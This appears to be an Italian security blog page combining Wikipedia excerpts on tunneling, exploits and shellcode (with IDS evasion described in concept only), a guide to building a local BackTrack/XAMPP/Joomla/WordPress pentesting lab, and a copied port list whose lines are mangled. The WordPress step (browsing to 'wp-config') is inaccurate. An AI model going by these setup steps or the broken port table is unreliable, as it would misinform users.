/inf0 – [IT]

Tunneling

Da Wikipedia, l’enciclopedia libera.

Nelle reti di calcolatori, il termine tunneling si riferisce a un insieme di tecniche per cui un protocollo viene incapsulato in un protocollo dello stesso livello o di livello superiore per realizzare configurazioni particolari.

Nelle configurazioni normali, un protocollo viene incapsulato in un altro protocollo di livello inferiore. Ad esempio, IP viene incapsulato in ethernet.

  • Un insieme importante delle tecniche di tunneling sono quelle usate per realizzare VPN, in cui IP viene incapsulato in IP, TCP o UDP, inserendo uno strato di crittografia. In queste tecniche, due reti IP, o due parti della stessa sottorete IP, entrambe connesse ad internet, vengono interconnesse facendo passare il traffico all’interno di una connessione che viene trasmessa su internet.
  • La funzionalità di port forwarding di SSH consente di inoltrare connessioni TCP tra host arbitrari all’interno di una connessione SSH, che a sua volta viaggia su TCP. In questo modo si riesce facilmente a proteggere un protocollo applicativo insicuro per farlo transitare su una rete non fidata, oppure ad aggirare limitazioni realizzate attraverso firewall o configurazioni di routing che non permetterebbero a due host di comunicare direttamente.
  • L’utilizzo di protocolli di livello rete per trasportare IP, che a sua volta è un protocollo di livello rete, è a sua volta una forma di tunneling. L’esempio tipico è la connessione di due reti IP attraverso un tunnel ATM: in tal caso, il pacchetto IP viene inserito (e opportunamente frammentato) all’interno del campo dati della cella ATM, trasmesso attraverso la rete e quindi spacchettato e ricomposto all’arrivo. In questo modo, gli switch ATM non si renderanno conto di cosa stanno trasmettendo, perché il campo dati è trasmesso così com’è, senza dover essere interpretato. Ai capi del tunnel è necessario inserire router multiprotocollo, che siano in grado di compiere le operazioni di impacchettamento dei dati.
  • Per trasportare il protocollo IPv6 all’interno di IPv4, o viceversa, si usano dei tunnel. Un insieme di tecniche di tunneling sono state previste per gestire la transizione da IPv4 a IPv6.

Exploit

Da Wikipedia, l’enciclopedia libera.

Vai a: Navigazione, cerca

Un exploit è un termine usato in informatica per identificare un metodo che, sfruttando un bug o una vulnerabilità, porta all’acquisizione di privilegi o al denial of service di un computer.

Ci sono diversi modi per classificare gli exploit. Il più comune è una classificazione a seconda del modo in cui l’exploit contatta l’applicazione vulnerabile. Un exploit remoto è compiuto attraverso la rete e sfrutta la vulnerabilità senza precedenti accessi al sistema. Un exploit locale richiede un preventivo accesso al sistema e solitamente fa aumentare i privilegi dell’utente oltre a quelli impostati dall’amministratore.

Gli exploit possono anche essere classificati a seconda del tipo di vulnerabilità che sfruttano. Vedi buffer overflow, Heap Overflow, format string attacks, race condition, double free(), Integer overflow, sql injection, cross-site scripting e cross-site request forgery.

Lo scopo di molti exploit è quello di acquisire i privilegi di root su un sistema. È comunque possibile usare exploit che dapprima acquisiscono un accesso con i minimi privilegi e che poi li alzano fino ad arrivare a root.

Normalmente un exploit può sfruttare solo una specifica falla e quando è pubblicato questa falla è riparata e l’exploit diventa obsoleto per le nuove versioni del programma. Per questo motivo alcuni blackhat hacker non divulgano gli exploit trovati ma li tengono riservati per loro o per la loro comunità. Questi exploit sono chiamati zero day exploit, e scoprire il loro contenuto è il più grande desiderio per gli attacker senza conoscenze, altrimenti detti script kiddie.

***

Shellcode

Da Wikipedia, l’enciclopedia libera.

Vai a: Navigazione, cerca

Uno shellcode è un programma in linguaggio assembly che tradizionalmente esegue una shell, come la shell Unix ‘/bin/sh’ oppure la shell command.com sui sistemi operativi DOS e Microsoft Windows. Uno shellcode può essere utilizzato per sfruttare un exploit, consentendo ad un hacker o un cracker di acquisire l’accesso alla riga di comando di un computer.

Come funziona uno shellcode [modifica]

Gli shellcode sono tipicamente inseriti nella memoria del computer sfruttando buffer overflow nello stack e nell’heap, o tramite un format string attack. L’esecuzione dello shellcode può essere ottenuta sovrascrivendo l’indirizzo di ritorno dello stack con l’indirizzo dello shellcode. In questo modo quando la subroutine prova a ritornare al chiamante, ritorna invece al codice dello shellcode che apre una riga di comando che può essere usata dal cracker.

Scoprire l’inserimento di shellcode [modifica]

I cracker che scrivono gli shellcode utilizzano spesso tecniche per nascondere il loro attacco. Essi provano generalmente ad aggirare il modo in cui i gli Intrusion Detection Systems (IDS) riconoscono un attacco in arrivo. Un tipico IDS di solito cerca in tutti i pacchetti in arrivo gli spezzoni di codice tipici degli shellcode (spesso un grande array di istruzioni NOP); se vengono trovati il pacchetto viene scartato prima di arrivare all’applicazione cui è destinato. Il punto debole degli IDS è che non possono fare delle ricerche effettivamente buone poiché richiederebbe troppo tempo, rallentando così la connessione ad Internet.

Gli shellcode contengono spesso una stringa con il nome di una shell. Tutti i pacchetti in arrivo che contengono una stringa del genere sono considerati abbastanza sospetti dal punto di vista dell’IDS. Inoltre, alcune applicazioni non accettano input non-alfanumerici (ossia, non accettano nient’altro che i caratteri a-z, A-Z, 0-9, e pochi altri).

Per aggirare questo tipo di misure anti-intrusione, i cracker fanno a volte uso di crittazione, codice auto-modificante, codice polimorfico e codice alfanumerico

***

***

Inserisco quì tutta la procedura necessaria pr avere in locale sulla propria BackTrack un webserver come lo xampp , per fare in modo che tutti coloro che vogliano fare delle prove di pentesting possno farlo in locale.

Dopo aver installato lo xampp , ci sono anche le istruzioni per installare i CSM Joomla! , e WordPress
Per queste operazioni ho preso spunto dal sito di Apachefriends per lo Xampp , e per Joomla! da queste videolezioni.

1240jpg.gif

Facciamo il download tramite Sourceforge.net , e scaricate il file nella vostra /root , dopodiché procediamo con lo scompattare l’archivio e posizionarlo in /opt

Ho fatto una piccola pubblicità a Sourceforge , sempre fondamentale per tutti noi , ma chi volesse può fare tutto in automatico dando da terminale il comando:

wget -c http://sourceforge.net/project/downloading.php?group_id=61776&use_mirror=surfnet&filename=xampp-linux-1.6.3b.tar.gz&79965514

(scusate la formattazione ma èp tutto attaccato , quindi chi volesse , copia/incolla…)e si ritrova nella propria /root , il proprio archivio di Xampp. Fatto questo procediamo
tar xvfz xampp-linux-1.6.3b.tar.gz -C /opt

Questa procedura installerà Xampp sul nostro sistema e per avviarlo basterà dare questo comando:

/opt/lampp/lampp start

mentre per fermarlo il comando sarà:

/opt/lampp/lampp stop

Ora bisogna configurare la sicurezza del nostro Xampp dando il seguente comando:
/opt/lampp/lampp security

stando attenti a non dimenticare le nostre password per MySQL il lampp ed il resto.

Durante la configurazione vi sarà chiesto se volete rendere accessibile il vostro server da web , a voi la risposta.

Quando farete i vostri lavori salvateli nella cartella:

/opt/lampp/htdocs/

Ora siamo naturalmente in backtrack , ed io consiglio sempre di avviare e di fermare il tutto con i comandi descritti sopra dati tramite Shell…..Konsole , ma per chi volesse può benissimo crearsi un launcher.

per chi lo desidera quindi :

posizioniamoci sul Desktop e con il tasto destro scegliamo l’opzione da menù New—>Create Link To Application… , inseriamo il comando , l’icona , o altri dati utili , se vogliamo una breve descrizione , e infine il nome Xampp. Se vogliamo invece crearci un icona sul menù Start di KDE andiamo appunto sul MenùStart ed appena si apre il menù con il tasto destro scegliamo EditItemMenu e dal gestore di KDE creiamo una nuova voce con NewItem , ancora scriviamo il comando e tutto il necessario , posizioniamo Xampp dove vogliamo , salviamo tramite l’icona, e usciamo dal gestore dei menù di KDE.

Avremo così il nostro webserver avviabile tramite interfaccia grfica.

Attenzione che questa guida è valida solo per backtrack , per tutte le altre distro , il posizionamento e gli stessi comandi cambiano tutti!

Passiamo ora alla verifica , andiamo in Shell , e digitiamo il comando di avvio del nostro webserver con il comando:

/opt/lampp/lampp start

vedremo che la risposta del sistema in konsole sarà la descrizione dell’ avvio del nostro Xampp for LINUX , di PHP-5 e di MySQL , a questo punto con il nostro browser preferito , Firefox per me , digitando nella barra degli indirizzi http://localhost/ riusciamo ad accedere alla pagina di Xampp , naturalmente dopo aver inserito username e password.

Dopo questa breve descrizione passiamo all’ installazione del CSM Joomla! dopodiché inizieremo subito a parlare dell’ argomento come da titolo.

Scarichiamo l’ultima release di Joomla! dal sito di Joomla.it , e una volta scaricato l’archivio estraiamolo e posizioniamolo nel posto in cui ho detto prima inseriamo i nostri lavori del webserver prima creato….e cioé in /opt/lampp/htdocs

Passiamo all’ installazione di joomla!

joomla_logo.png
Joomla! è un CSM totalmente opensource , e in Italia e nel mondo ha un forte appoggio tramite tutte le sue comunità , è potente , e utilizzabile con un estrema facilità.

L’installazione di un CSM quale Joomla! , non è difficile , è abbastanza intuitiva come procedura , ma dobbiamo sempre ricordarci che non solo siamo in ambiente LKinux , ma siamo addirittura in backtrack , quindi dobbiamo seguire la procedura tenendo conto della nostra situazione , ad esempio quella di essere sempre /root , che può essere a seconda dei casi un vantaggio , ma che ci ricorda anche di stare attenti altrimenti possiamo fare degli enormi danni al nostro sistema.

Per installare Joomla! , ci basta entrare nella cartella appena creata con l’ estrazione dell’ archivio tramite Firefox , entrare anora nella cartella Installation ed andare a selezionare , index.php , oppure andare con il nostro filemanager Konqueror , selezionare installation.php e con il tasto destro apri con… e scrivere firefox , che attraverso una procedura guidata , ci guiderà nell’ installazione di Joomla!

Durante l’installazione ci verranno chiesti dei dati , che vanno dal nome del nostro “sito” , alle password da inserire per il database MySQL.

Innanzitutto bisogna controllare la fase di PRE-INSTALLATION , dove ci compariranno le descrizioni di tutte le configurazioni degli script e dei moduli che attualmente si trovano nel nostro databse , tutte le scritte che ci compaiono in rosso , sono da sistemare , io personalmente ne ho travate un paio , ma sono di facile correzione ed alcune addirittura non sono poi così fondamentali , tant’é che una configurazione riguardante il PHPmyadmin è ancora da sistemare , ma per il nostro scopo puramente informativo e quindi più o meno “superficiale” , non crea alcun problema. Assicuriamoci di avere , per coloro che in backtrack si sono creati degli utenti ,(per chì lo desidera qui c’é uno script gentilmente concesso da zogs e “hostato” su evilsocket.net), che non sono quindi /root , di avere per Joomla! tutte le cartelle con permessi in lettura/scrittura , altrimenti Joomla! ci segnalerà le cartelle senza permessi adeguati colorandole di rosso….e noi dovremmo portarle in verde adeguandovi quindi i permessi.

Arriviamo così alla prima schermata che riguarderà l’ accettazione della licenza.

La seconda riguarda invece la configurazione del database MySQL , dobbiamo inserire l’ hostname , la password ed il nome del database MySQL , e l’ estensione da dare alle nostre tabelle , questa ad esempio , io l’ho lasciata di default jos_ .

Arrivati alla 3^ schermata dobbiamo inserire la PATH dell’ installazione che nel nostro caso è: /opt/lampp/htdocs/joomla , inseriamo la nostra email , e la password per l’ amministrazione del database.

A questo punto l’installazione di Joomla! è stata completata con successo , l’importante è che prima di avviare joomla! , si rimuova completamente la cartella di installazione , oppure come io stesso ho fatto , andate a cambiare il nome della cartella da joomla a pippo o come volete chiamarla voi.

Ora , Joomla! è installato , e avendo il nostro webserver in locale , è come se avessimo un vero e proprio sito web , che possiamo personalizzare come vogliamo noi , Joomla! , a merito di tutta la sua comunità , ha ad esempio molte templates , che possono rendere il nostro “sito” , personalizzabile , ma quì vi lascio a voi stessi , altrimenti andrei troppo fuoriluogo.

wordpress-logo.png

Per fare pentesting io ho usato un blog su wordpress , e se volete cambiare l’ installazione di Joomla! con WordPress , le operazioni da fare sono sempre le stesse , scaricarsi wordpress dal sito ufficiale , ed inserire l’ archivio in ~/Htdocs , dopo averlo scompattato , quindi dirigersi con il proprio browser sl file wp-config.

Il file wp-config , dovrete però ottenerlo dal file wp-config-sample , vi basta rinominarlo , togliendo il -sample , e potete quindi dirigervi sullo stesso con il vostro browser , che la maggiorparte delle volte dovrà recarsi all’ indirizzo “http://localhost/wp-config” , quindi da quì iniziare l’ installazione di WordPress.

***

È stato inserito nel nostro BOX-Sharing un whitepaper che ho scaricato dal WIKI di remote-exploit.org , che può interessare a tutti coloro che si affacciano ora al mondo della backtrack , parla di come può essere fatto un primo uso della distro , dei vari tipi di installazione e di molte altre cosette utili , anche se nel Blog ci sono in italiano , credo sia sempre utile avere un whitepaper del genere.

lo troverete nel Box , nella directory Backtrack , è in *.pdf e si chiama beginning-Bt.

ciao a tutti.

***

***

Quì pubblico un testo che contiene tutte le porte con relativa descrizione , (non ricordo dove l’ ho preso) , di un sistema che credo sia sempre utile.

Keyword Decimal Description References
------- ------- ----------- ----------
0/tcp Reserved
0/udp Reserved
tcpmux 1/tcp TCP Port Service Multiplexer
tcpmux 1/udp TCP Port Service Multiplexer
compressnet 2/tcp Management Utility
compressnet 2/udp Management Utility
compressnet 3/tcp Compression Process
compressnet 3/udp Compression Process
# 4/tcp Unassigned#
4/udp Unassigned
rje 5/tcp Remote Job Entry
rje 5/udp Remote Job Entry
# 6/tcp Unassigned#
6/udp Unassigned
echo 7/tcp Echoecho
7/udp Echo
# 8/tcp Unassigned
# 8/udp Unassigneddiscard
9/tcp Discard
discard 9/udp Discard
# 10/tcp Unassigned#
10/udp Unassigned
systat 11/tcp Active Userssystat
11/udp Active Users
# 12/tcp Unassigned#
12/udp Unassigned
daytime 13/tcp Daytimedaytime
13/udp Daytime
# 14/tcp Unassigned#
14/udp Unassigned
# 15/tcp Unassigned [was netstat]
# 15/udp Unassigned#
16/tcp Unassigned
# 16/udp Unassignedqotd
17/tcp Quote of the Day
qotd 17/udp Quote of the Day
msp 18/tcp Message Send Protocol
msp 18/udp Message Send Protocol
chargen 19/tcp Character Generator
chargen 19/udp Character Generator
ftp-data 20/tcp File Transfer [Default Data]
ftp-data 20/udp File Transfer [Default Data]
ftp 21/tcp File Transfer [Control]
ftp 21/udp File Transfer [Control]
ssh 22/tcp secure shell
ssh 22/udp secure shell
telnet 23/tcp Telnet
telnet 23/udp Telnet
Telnet RFC 854
24/tcp any private mail system
24/udp any private mail system
smtp 25/tcp Simple Mail Transfer
smtp 25/udp Simple Mail Transfer
# 26/tcp Unassigned#
26/udp Unassigned
nsw-fe 27/tcp NSW User System FE
nsw-fe 27/udp NSW User System FE
# 28/tcp Unassigned#
28/udp Unassigned
msg-icp 29/tcp MSG ICPmsg-icp
29/udp MSG ICP
# 30/tcp Unassigned#
30/udp Unassigned
msg-auth 31/tcp MSG Authentication
msg-auth 31/udp MSG Authentication
# 32/tcp Unassigned#
32/udp Unassigned
dsp 33/tcp Display Support Protocol
dsp 33/udp Display Support Protocol
# 34/tcp Unassigned#
34/udp Unassigned
35/tcp any private printer server
35/udp any private printer server
# 36/tcp Unassigned#
36/udp Unassigned
time 37/tcp Timetime
37/udp Time
rap 38/tcp Route Access Protocol
rap 38/udp Route Access Protocol
rlp 39/tcp Resource Location Protocol
rlp 39/udp Resource Location Protocol
# 40/tcp Unassigned#
40/udp Unassigned
graphics 41/tcp Graphicsgraphics
41/udp Graphics
nameserver 42/tcp Host Name Server
nameserver 42/udp Host Name Servernicname
43/tcp Who Is
nicname 43/udp Who Ismpm-flags
44/tcp MPM FLAGS Protocol
mpm-flags 44/udp MPM FLAGS Protocol
mpm 45/tcp Message Processing Module [recv]
mpm 45/udp Message Processing Module [recv]
mpm-snd 46/tcp MPM [default send]
mpm-snd 46/udp MPM [default send]
ni-ftp 47/tcp NI FTP
ni-ftp 47/udp NI FTP
auditd 48/tcp Digital Audit Daemon
auditd 48/udp Digital Audit Daemon
login 49/tcp Login Host Protocol
login 49/udp Login Host Protocol
re-mail-ck 50/tcp Remote Mail Checking Protocol
re-mail-ck 50/udp Remote Mail Checking Protocol
la-maint 51/tcp IMP Logical Address Maintenance
la-maint 51/udp IMP Logical Address Maintenance
xns-time 52/tcp XNS Time Protocol
xns-time 52/udp XNS Time Protocol
domain 53/tcp Domain Name Server
domain 53/udp Domain Name Server
xns-ch 54/tcp XNS Clearinghouse
xns-ch 54/udp XNS Clearinghouse
isi-gl 55/tcp ISI Graphics Language
isi-gl 55/udp ISI Graphics Language
xns-auth 56/tcp XNS Authentication
xns-auth 56/udp XNS Authentication
57/tcp any private terminal access
57/udp any private terminal access
xns-mail 58/tcp XNS Mailxns-mail
58/udp XNS Mail
59/tcp any private file service
59/udp any private file service
60/tcp Unassigned
60/udp Unassigned
ni-mail 61/tcp NI MAILni-mail
61/udp NI MAIL
acas 62/tcp ACA Servicesacas
62/udp ACA Services
# 63/tcp Unassigned#
63/udp Unassigned
covia 64/tcp Communications Integrator (CI)
covia 64/udp Communications Integrator (CI)
tacacs-ds 65/tcp TACACS-Database Service
tacacs-ds 65/udp TACACS-Database Service
sql*net 66/tcp Oracle SQL*NET
sql*net 66/udp Oracle SQL*NET
bootps 67/tcp Bootstrap Protocol Server
bootps 67/udp Bootstrap Protocol Server
bootpc 68/tcp Bootstrap Protocol Client
bootpc 68/udp Bootstrap Protocol Client
tftp 69/tcp Trivial File Transfer
tftp 69/udp Trivial File Transfer
gopher 70/tcp Gophergopher
70/udp Gopher
netrjs-1 71/tcp Remote Job Service
netrjs-1 71/udp Remote Job Service
netrjs-2 72/tcp Remote Job Service
netrjs-2 72/udp Remote Job Service
netrjs-3 73/tcp Remote Job Service
netrjs-3 73/udp Remote Job Service
netrjs-4 74/tcp Remote Job Service
netrjs-4 74/udp Remote Job Service
75/tcp any private dial out service
75/udp any private dial out service
deos 76/tcp Distributed External Object Store
deos 76/udp Distributed External Object Store
77/tcp any private RJE service
77/udp any private RJE service
vettcp 78/tcp vettcpvettcp
78/udp vettcp
finger 79/tcp Finger
finger 79/udp Finger
www-http 80/tcp World Wide Web HTTP
www-http 80/udp World Wide Web HTTP
hosts2-ns 81/tcp HOSTS2 Name Server
hosts2-ns 81/udp HOSTS2 Name Server
xfer 82/tcp XFER Utilityxfer
82/udp XFER Utility
mit-ml-dev 83/tcp MIT ML Devicemit-ml-dev
83/udp MIT ML Device
ctf 84/tcp Common Trace Facility
ctf 84/udp Common Trace Facility
mit-ml-dev 85/tcp MIT ML Devicemit-ml-dev
85/udp MIT ML Device
mfcobol 86/tcp Micro Focus Cobol
mfcobol 86/udp Micro Focus Cobol
87/tcp any private terminal link
87/udp any private terminal link
kerberos 88/tcp Kerberos
88/udp Kerberos
su-mit-tg 89/tcp SU/MIT Telnet Gateway
su-mit-tg 89/udp SU/MIT Telnet Gateway
dnsix 90/tcp DNSIX Securit Attribute Token Map
dnsix 90/udp DNSIX Securit Attribute Token Map
mit-dov 91/tcp MIT Dover Spooler
mit-dov 91/udp MIT Dover Spooler
npp 92/tcp Network Printing Protocol
npp 92/udp Network Printing Protocol
dcp 93/tcp Device Control Protocol
dcp 93/udp Device Control Protocol
objcall 94/tcp Tivoli Object Dispatcher
objcall 94/udp Tivoli Object Dispatcher
supdup 95/tcp SUPDUPsupdup
95/udp SUPDUP
dixie 96/tcp DIXIE Protocol Specification
dixie 96/udp DIXIE Protocol Specification
swift-rvf 97/tcp Swift Remote Vitural File Protocol
swift-rvf 97/udp Swift Remote Vitural File Protocol
tacnews 98/tcp TAC Newstacnews
98/udp TAC News
metagram 99/tcp Metagram Relay
metagram 99/udp Metagram Relay
newacct 100/tcp [unauthorized use]
hostname 101/tcp NIC Host Name Server
hostname 101/udp NIC Host Name Server
iso-tsap 102/tcp ISO-TSAPiso-tsap
102/udp ISO-TSAP
gppitnp 103/tcp Genesis Point-to-Point Trans Net
gppitnp 103/udp Genesis Point-to-Point Trans Net
acr-nema 104/tcp ACR-NEMA Digital Imag. & Comm. 300
acr-nema 104/udp ACR-NEMA Digital Imag. & Comm. 300
csnet-ns 105/tcp Mailbox Name Nameserver
csnet-ns 105/udp Mailbox Name Nameserver
3com-tsmux 106/tcp 3COM-TSMUX3com-tsmux
106/udp 3COM-TSMUX
rtelnet 107/tcp Remote Telnet Service
rtelnet 107/udp Remote Telnet Service
snagas 108/tcp SNA Gateway Access Server
snagas 108/udp SNA Gateway Access Server
pop2 109/tcp Post Office Protocol - Version 2
pop2 109/udp Post Office Protocol - Version 2
pop3 110/tcp Post Office Protocol - Version 3
pop3 110/udp Post Office Protocol - Version 3
sunrpc 111/tcp SUN Remote Procedure Call
sunrpc 111/udp SUN Remote Procedure Call
mcidas 112/tcp McIDAS Data Transmission Protocol
mcidas 112/udp McIDAS Data Transmission Protocol
auth 113/tcp Authentication Service
auth 113/udp Authentication Service
audionews 114/tcp Audio News Multicast
audionews 114/udp Audio News Multicast
sftp 115/tcp Simple File Transfer Protocol
sftp 115/udp Simple File Transfer Protocol
ansanotify 116/tcp ANSA REX Notify
ansanotify 116/udp ANSA REX Notify
uucp-path 117/tcp UUCP Path Service
uucp-path 117/udp UUCP Path Service
sqlserv 118/tcp SQL Servicessqlserv
118/udp SQL Services
nntp 119/tcp Network News Transfer Protocol
nntp 119/udp Network News Transfer Protocol
cfdptkt 120/tcp CFDPTKTcfdptkt
120/udp CFDPTKT
erpc 121/tcp Encore Expedited Remote Pro.Call
erpc 121/udp Encore Expedited Remote Pro.Call
smakynet 122/tcp SMAKYNETsmakynet
122/udp SMAKYNET
ntp 123/tcp Network Time Protocol
ntp 123/udp Network Time Protocol
ansatrader 124/tcp ANSA REX Trader
ansatrader 124/udp ANSA REX Trader
locus-map 125/tcp Locus PC-Interface Net Map Ser
locus-map 125/udp Locus PC-Interface Net Map Ser
unitary 126/tcp Unisys Unitary Login
unitary 126/udp Unisys Unitary Login
locus-con 127/tcp Locus PC-Interface Conn Server
locus-con 127/udp Locus PC-Interface Conn Server
gss-xlicen 128/tcp GSS X License Verification
gss-xlicen 128/udp GSS X License Verification
pwdgen 129/tcp Password Generator Protocol
pwdgen 129/udp Password Generator Protocol
cisco-fna 130/tcp cisco FNATIVE
cisco-fna 130/udp cisco FNATIVEcisco-tna
131/tcp cisco TNATIVE
cisco-tna 131/udp cisco TNATIVE
cisco-sys 132/tcp cisco SYSMAINT
cisco-sys 132/udp cisco SYSMAINT
statsrv 133/tcp Statistics Service
statsrv 133/udp Statistics Service
ingres-net 134/tcp INGRES-NET Service
ingres-net 134/udp INGRES-NET Service
loc-srv 135/tcp Location Service
loc-srv 135/udp Location Service
profile 136/tcp PROFILE Naming System
profile 136/udp PROFILE Naming System
netbios-ns 137/tcp NETBIOS Name Service
netbios-ns 137/udp NETBIOS Name Service
netbios-dgm 138/tcp NETBIOS Datagram Service
netbios-dgm 138/udp NETBIOS Datagram Service
netbios-ssn 139/tcp NETBIOS Session Service
netbios-ssn 139/udp NETBIOS Session Service
emfis-data 140/tcp EMFIS Data Service
emfis-data 140/udp EMFIS Data Service
emfis-cntl 141/tcp EMFIS Control Service
emfis-cntl 141/udp EMFIS Control Service
bl-idm 142/tcp Britton-Lee IDM
bl-idm 142/udp Britton-Lee IDM
imap2 143/tcp Interim Mail Access Protocol v2
imap2 143/udp Interim Mail Access Protocol v2
news 144/tcp NewSnews
144/udp NewS
uaac 145/tcp UAAC Protocoluaac
145/udp UAAC Protocol
iso-tp0 146/tcp ISO-IP0iso-tp0
146/udp ISO-IP0
iso-ip 147/tcp ISO-IPiso-ip
147/udp ISO-IP
cronus 148/tcp CRONUS-SUPPORT
cronus 148/udp CRONUS-SUPPORT
aed-512 149/tcp AED 512 Emulation Service
aed-512 149/udp AED 512 Emulation Service
sql-net 150/tcp SQL-NETsql-net
150/udp SQL-NET
hems 151/tcp HEMShems
151/udp HEMS
bftp 152/tcp Background File Transfer Program
bftp 152/udp Background File Transfer Program
sgmp 153/tcp SGMPsgmp
153/udp SGMP
netsc-prod 154/tcp NETSCnetsc-prod
154/udp NETSC
netsc-dev 155/tcp NETSCnetsc-dev
155/udp NETSC
sqlsrv 156/tcp SQL Servicesqlsrv
156/udp SQL Service
knet-cmp 157/tcp KNET/VM Command/Message Protocol
knet-cmp 157/udp KNET/VM Command/Message Protocol
pcmail-srv 158/tcp PCMail Serverpcmail-srv
158/udp PCMail Server
nss-routing 159/tcp NSS-Routingnss-routing
159/udp NSS-Routing
sgmp-traps 160/tcp SGMP-TRAPSsgmp-traps
160/udp SGMP-TRAPS
snmp 161/tcp SNMPsnmp
161/udp SNMP
snmptrap 162/tcp SNMPTRAPsnmptrap
162/udp SNMPTRAP
cmip-man 163/tcp CMIP/TCP Manager
cmip-man 163/udp CMIP/TCP Manager
cmip-agent 164/tcp CMIP/TCP Agent
smip-agent 164/udp CMIP/TCP Agent
xns-courier 165/tcp Xeroxxns-courier
165/udp Xerox
s-net 166/tcp Sirius Systems
s-net 166/udp Sirius Systems
namp 167/tcp NAMPnamp
167/udp NAMP
rsvd 168/tcp RSVDrsvd
168/udp RSVD
send 169/tcp SENDsend
169/udp SEND
print-srv 170/tcp Network PostScript
print-srv 170/udp Network PostScript
multiplex 171/tcp Network Innovations Multiplex
multiplex 171/udp Network Innovations Multiplex
cl/1 172/tcp Network Innovations CL/1
cl/1 172/udp Network Innovations CL/1
xyplex-mux 173/tcp Xyplexxyplex-mux
173/udp Xyplex
mailq 174/tcp MAILQmailq
174/udp MAILQ
vmnet 175/tcp VMNETvmnet
175/udp VMNET
genrad-mux 176/tcp GENRAD-MUXgenrad-mux
176/udp GENRAD-MUX
xdmcp 177/tcp X Display Manager Control Protocol
xdmcp 177/udp X Display Manager Control Protocol
nextstep 178/tcp NextStep Window Server
NextStep 178/udp NextStep Window Server
bgp 179/tcp Border Gateway Protocol
bgp 179/udp Border Gateway Protocol
ris 180/tcp Intergraphris
180/udp Intergraph
unify 181/tcp Unifyunify
181/udp Unify
audit 182/tcp Unisys Audit SITP
audit 182/udp Unisys Audit SITP
ocbinder 183/tcp OCBinderocbinder
183/udp OCBinder
ocserver 184/tcp OCServerocserver
184/udp OCServer
remote-kis 185/tcp Remote-KISremote-kis
185/udp Remote-KIS
kis 186/tcp KIS Protocolkis
186/udp KIS Protocol
aci 187/tcp Application Communication Interface
aci 187/udp Application Communication Interface
mumps 188/tcp Plus Five's MUMPS
mumps 188/udp Plus Five's MUMPS
qft 189/tcp Queued File Transport
qft 189/udp Queued File Transport
gacp 190/tcp Gateway Access Control Protocol
cacp 190/udp Gateway Access Control Protocol
prospero 191/tcp Prospero Directory Service
prospero 191/udp Prospero Directory Service
osu-nms 192/tcp OSU Network Monitoring System
osu-nms 192/udp OSU Network Monitoring System
srmp 193/tcp Spider Remote Monitoring Protocol
srmp 193/udp Spider Remote Monitoring Protocol
irc 194/tcp Internet Relay Chat Protocol
irc 194/udp Internet Relay Chat Protocol
dn6-nlm-aud 195/tcp DNSIX Network Level Module Audit
dn6-nlm-aud 195/udp DNSIX Network Level Module Audit
dn6-smm-red 196/tcp DNSIX Session Mgt Module Audit Redir
dn6-smm-red 196/udp DNSIX Session Mgt Module Audit Redir
dls 197/tcp Directory Location Service
dls 197/udp Directory Location Service
dls-mon 198/tcp Directory Location Service Monitor
dls-mon 198/udp Directory Location Service Monitor
smux 199/tcp SMUX
smux 199/udp SMUX
src 200/tcp IBM System Resource Controller
src 200/udp IBM System Resource Controller
at-rtmp 201/tcp AppleTalk Routing Maintenance
at-rtmp 201/udp AppleTalk Routing Maintenance
at-nbp 202/tcp AppleTalk Name Binding
at-nbp 202/udp AppleTalk Name Binding
at-3 203/tcp AppleTalk Unused
at-3 203/udp AppleTalk Unused
at-echo 204/tcp AppleTalk Echo
at-echo 204/udp AppleTalk Echo
at-5 205/tcp AppleTalk Unused
at-5 205/udp AppleTalk Unused
at-zis 206/tcp AppleTalk Zone Information
at-zis 206/udp AppleTalk Zone Information
at-7 207/tcp AppleTalk Unused
at-7 207/udp AppleTalk Unused
at-8 208/tcp AppleTalk Unused
at-8 208/udp AppleTalk Unused
tam 209/tcp Trivial Authenticated Mail Protocol
tam 209/udp Trivial Authenticated Mail Protocol
z39.50 210/tcp ANSI Z39.50z39.50
210/udp ANSI Z39.50
914c/g 211/tcp Texas Instruments 914C/G Terminal
914c/g 211/udp Texas Instruments 914C/G Terminal
anet 212/tcp ATEXSSTRanet
212/udp ATEXSSTR
ipx 213/tcp IPXipx
213/udp IPX
vmpwscs 214/tcp VM PWSCSvmpwscs
214/udp VM PWSCS
softpc 215/tcp Insignia Solutions
softpc 215/udp Insignia Solutions
atls 216/tcp Access Technology License Server
atls 216/udp Access Technology License Server
dbase 217/tcp dBASE Unix
dbase 217/udp dBASE Unix# Don Gibson
mpp 218/tcp Netix Message Posting Protocol
mpp 218/udp Netix Message Posting Protocol
uarps 219/tcp Unisys ARPsuarps
219/udp Unisys ARPs
imap3 220/tcp Interactive Mail Access Protocol v3
imap3 220/udp Interactive Mail Access Protocol v3
fln-spx 221/tcp Berkeley rlogind with SPX auth
fln-spx 221/udp Berkeley rlogind with SPX auth
rsh-spx 222/tcp Berkeley rshd with SPX auth
rsh-spx 222/udp Berkeley rshd with SPX auth
cdc 223/tcp Certificate Distribution Center
cdc 223/udp Certificate Distribution Center
# 224-241 Reserved
# 242/tcp Unassigned#
242/udp Unassigned
sur-meas 243/tcp Survey Measurement
sur-meas 243/udp Survey Measurement
# 244/tcp Unassigned#
244/udp Unassigned
link 245/tcp LINKlink
245/udp LINK
dsp3270 246/tcp Display Systems Protocol
dsp3270 246/udp Display Systems Protocol
# 247-255 Reserved
# 256-343 Unassigned
pdap 344/tcp Prospero Data Access Protocol
pdap 344/udp Prospero Data Access Protocol
pawserv 345/tcp Perf Analysis Workbench
pawserv 345/udp Perf Analysis Workbench
zserv 346/tcp Zebra serverzserv
346/udp Zebra server
fatserv 347/tcp Fatmen Serverfatserv
347/udp Fatmen Server
csi-sgwp 348/tcp Cabletron Management Protocol
csi-sgwp 348/udp Cabletron Management Protocol
# 349-370 Unassigned
clearcase 371/tcp Clearcaseclearcase
371/udp Clearcase
ulistserv 372/tcp Unix Listservulistserv
372/udp Unix Listserv
legent-1 373/tcp Legent Corporation
legent-1 373/udp Legent Corporation
legent-2 374/tcp Legent Corporation
legent-2 374/udp Legent Corporation
hassle 375/tcp Hasslehassle
375/udp Hassle
nip 376/tcp Amiga Envoy Network Inquiry Proto
nip 376/udp Amiga Envoy Network Inquiry Proto
tnETOS 377/tcp NEC Corporation
tnETOS 377/udp NEC Corporation
dsETOS 378/tcp NEC Corporation
dsETOS 378/udp NEC Corporation
is99c 379/tcp TIA/EIA/IS-99 modem client
is99c 379/udp TIA/EIA/IS-99 modem client
is99s 380/tcp TIA/EIA/IS-99 modem server
is99s 380/udp TIA/EIA/IS-99 modem server
hp-collector 381/tcp hp performance data collector
